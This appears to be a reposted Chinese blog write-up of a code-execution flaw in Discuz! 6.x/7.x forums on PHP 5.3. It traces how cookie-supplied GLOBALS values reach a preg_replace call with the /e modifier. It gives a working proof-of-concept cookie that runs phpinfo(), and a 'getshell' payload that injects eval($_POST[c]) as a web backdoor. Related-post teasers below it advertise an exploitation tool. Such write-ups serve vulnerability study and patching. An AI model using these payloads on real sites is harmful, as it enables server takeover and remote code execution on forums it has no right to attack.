Discuz! 6.x/7.x 全局变量防御绕过导致命令执行

最新推荐文章于 2022-09-15 11:20:16 发布
最新推荐文章于 2022-09-15 11:20:16 发布
阅读量235 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/yangxiaodi/p/6918898.html
版权

参考:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html

 

文件位于:include/discuzcode.func.php  第97-241行   函数 discuzcode() 

有这么一句话,$GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray']

$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);

然而在5.3.*中,$_REQUEST这个超全局变量的值受php.ini中request_order的影响,在最新的php5.3.x系列 中,request_order默认值为GP,也就是说默认配置下$_REQUEST只包含$_GET和$_POST,而不包括$_COOKIE,那么我们就可以通过COOKIE来提交GLOBALS变量了。(在5.3.29中默认是CGP)

为了演示漏洞就设置成GP。

 

$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);

 很典型的漏洞。preg_replace() 前两个参数可控,可就是说我们只要控制第一个参数是/e模式,第二个参数是我们要执行的php代码,就能构成一个后门了。

这里有个注意的点,就是不一定需要/e模式,

写个脚本跑跑看什么字符可以。

<?php
preg_replace($_GET['a'].'.*'.$_GET['a'].'e','phpinfo();','a',1)
?>

  

具体的有'"!@#$%^&*()-+等,但要注意传输过程中的转义。

通过cookie提交:GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

然后在调用discuzcode()函数的地方回显。

在/viewthread.php中  viewthread_procpost() 函数 第619-729行

在第725行调用了discuzcode()函数

	$post['message'] = discuzcode($post['message'], $post['smileyoff'], $post['bbcodeoff'], $post['htmlon'] & 1, $forum['allowsmilies'], $forum['allowbbcode'], ($forum['allowimgcode'] && $showimages ? 1 : 0), $forum['allowhtml'], ($forum['jammer'] && $post['authorid'] != $discuz_uid ? 1 : 0), 0, $post['authorid'], $forum['allowmediacode'], $post['pid']);

  

又在最前面的地方调用viewthread_procpost()函数

	while($post = $sdb->fetch_array($query)) {
		if(($onlyauthoradd && $post['anonymous'] == 0) || !$onlyauthoradd) {
			$postlist[$post['pid']] = viewthread_procpost($post);
		}
	}

  来到/include/discuzcode.func.php 当设置了$GLOBALS['_DCACHE']['smilies']的值以后,就能执行preg_replace(),造成代码执行。

	if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) {...}

  

 

 poc:在cookie中添加:GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

然后访问任一个帖子。/viewthread.php?tid=13&extra=page%3D1 就能触发漏洞

 

 getsshell:GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3B;

 

 

 

转载于:https://www.cnblogs.com/yangxiaodi/p/6918898.html

                

        

        




    




    

      

        

            

              
                
                  aixuan9365
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
Discuz 7.x/6.x 全局变量防御绕过导致代码执行

				
			

			

				

					qq_41048303的博客
				

				

					12-05
					
					2335
					
				

			

		

		

			
				
1.漏洞原理
​	由于php5.3 x版本里php.ini的设置request_order默认值为GP,导致Discuz 6.x/7.x全局变量防御绕过漏洞。
2.漏洞环境
​	执行docker-compose up -d 启动后,访问http://192.168.254.202:8080/install来安装discuz
​	数据库地址db,数据库名为discuz,数据库账号密码均为root

3.漏洞复现
安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCA

			
		

	



                

              
                



	

		

			

				
					
Discuz 7.x、6.x 全局变量防御绕过导致代码执行

				
			

			

				

					浅笑996的博客
				

				

					11-25
					
					1141
					
				

			

		

		

			
				
0x01 分析
由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。
具体原理请参考:
https://www.secpulse.com/archives/2338.html
0x02 环境...

			
		

	



                


  
              

                


	

		

			

				
					
dz开启php5.5,Discuz5.5.0代码高亮显示+运行代码框合成插件 下载第1/4页

				
			

			

				

					weixin_30658759的博客
				

				

					03-18
					
					71
					
				

			

		

		

			
				
主要功能:1.几乎支持所有程序代码的高亮显示,包括以下语言:Actionscript、ADA、ApacheLog、AppleScript、ASM、ASP、AutoIT、Backus-Naurform、Bash、BlitzBasic、C、CforMacs、C#、C++、CADDCL、CadLisp、CFDG、CFDG、ColdFusion、CSS、Delphi、DIV、DOS、Eiffel...

			
		

	





	

		

			

				
					
发主题帖随机中奖插件 for Discuz! 7.x GBK.rar

				
			

			

				

					07-14
				

			

		

		

			
				
是根据以前网页随机祝福修改的,没后台,但也不用修改任何数据库,呵呵,算是绿色环保吧。    安装方法:    include文件夹中newthread.inc.php  搜索  $bbcodeoff = checkbbcodes($message, !empty($bbcodeoff));...

			
		

	



		

			
		



	

		

			

				
					
Discuz x3.x模板 迪恩 游戏/VR/Game/测评 商业版 GBK.zip

				
			

			

				

					12-03
				

			

		

		

			
				
Discuz! X3.x是一款广泛使用的开源社区论坛软件,它以其强大的功能、灵活的扩展性和友好的用户体验深受广大站长喜爱。迪恩(Dean)是其中的一款知名模板开发者,其设计的模板在美观度和实用性上都有着出色的表现。...

			
		

	





	

		

			

				
					
商业编程-源码-MooPHP附件图片展示插件For Discuz!6.x v1.1.1.zip

				
			

			

				

					06-21
				

			

		

		

			
				
《MooPHP附件图片展示插件For Discuz!6.x v1.1.1:商业编程与源码解析》  MooPHP附件图片展示插件是专为Discuz!6.x论坛系统设计的一款强大工具,旨在提升论坛用户体验,特别是在处理图片附件方面。Discuz!作为国内...

			
		

	





	

		

			

				
					
Discuz!X3.5 X3.4腾讯云全局配置插件 1.0.0.zip

				
			

			

				

					08-11
				

			

		

		

			
				
X3.5 X3.4腾讯云全局配置插件 1.0.0.zip" 提供了一个专为Discuz! X3.5和X3.4论坛系统设计的插件,它整合了与腾讯云相关的各种服务,并允许用户在一个中心化的界面进行统一管理和配置。  【描述】中的关键信息表明,...

			
		

	





	

		

			

				
					
Tools_Discuz!X1.X_20101124_1.5.5M

				
			

			

				

					12-05
				

			

		

		

			
				
Discuz!X1.X工具集详解:20101124_1.5.5M版本的实用功能》  Discuz!X1.X是知名的社区论坛系统,广泛应用于各类网站,提供丰富的交互功能。针对这个系统,一套名为"Tools_Discuz!X1.X_20101124_1.5.5M"的工具包被...

			
		

	





	

		

			

				
					
Discuz!7.X 0day漏洞利用工具

				
			

			

				

					03-04
				

			

		

		

			
				
Discuz!7.X 0day漏洞利用工具分享下!

			
		

	





	

		

			

				
					
php7全局变量漏洞,Discuz! 6.x/7.x 全局变量防御绕过导致命令执行

				
			

			

				

					weixin_42361708的博客
				

				

					03-12
					
					316
					
				

			

		

		

			
				
漏洞概述:由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞。漏洞分析:include/global.func.php代码里:functiondaddslashes($string,$force=0){!defined('MAGIC_QUOTES_GPC')&&define(...

			
		

	





	

		

			

				
					
discuz7.2漏洞复现--python编写poc

				
			

			

				

					m0_65129142的博客
				

				

					12-21
					
					1095
					
				

			

		

		

			
				
环境搭建
准备一台win7装上的phpstudy
将discuz7.2源码放进去
安装discuz之前,需要先安装center
文件夹搭建存放的位置是:


解压完成之后更改名称
再然后需要把ucenter放到discuz源码下边



开始安装
安装discuz之前
首先需要安装ucenter
我们先将源码拉进phpstudy根目录下边

首先安装ucenter


需要填的只有标红框的


安装完成之后
我们进行安装2

最关键的一步来了
需要将ucenter的url修改成http://192.168.

			
		

	





	

		

			

				
					
Discuz

				
			

			

				

					xiwangyizhicunzai的博客
				

				

					11-22
					
					386
					
				

			

		

		

			
				
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
这是一个非常知名,历史漏洞也比较多的cms。
由于php5.3.x版本里php.ini的设置里request_order默认值为GP(只包含get和post,不包含cookie),导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。
核心利用代码:
include...

			
		

	





	

		

			

				
					
vulfocus——discuz命令执行(wooyun-2010-080723)

				
			

			

				

					m0_62063669的博客
				

				

					09-15
					
					1327
					
				

			

		

		

			
				
PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。2.找到一个帖子,然后用burp suite抓包。

			
		

	





	

		

			

				
					
AJAX__discuz函数showmessage()在ajax下

				
			

			

				

					dabao1989的专栏
				

				

					12-17
					
					2107
					
				

			

		

		

			
				
当 showmessage 在 Ajax 环境下方式调用(即 $_G['inajax'] 为 true),并且 GET、POST 中存在 handlekey 时(即 $_G['gp_handlekey'] 有值)时,你可以在 Ajax
 页面书写以下 2 个函数,用 JS 处理返回的信息。

成功时调用的函数




function succeedhandle_$_G['gp_h

			
		

	





	

		

			

				
					
SERVER全局变量绕过

					
最新发布

				
			

			

				

					09-03
				

			

		

		

			
				
 6.x/7.x 全局变量防御绕过导致命令执行](https://blog.csdn.net/weixin_42361708/article/details/115651776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值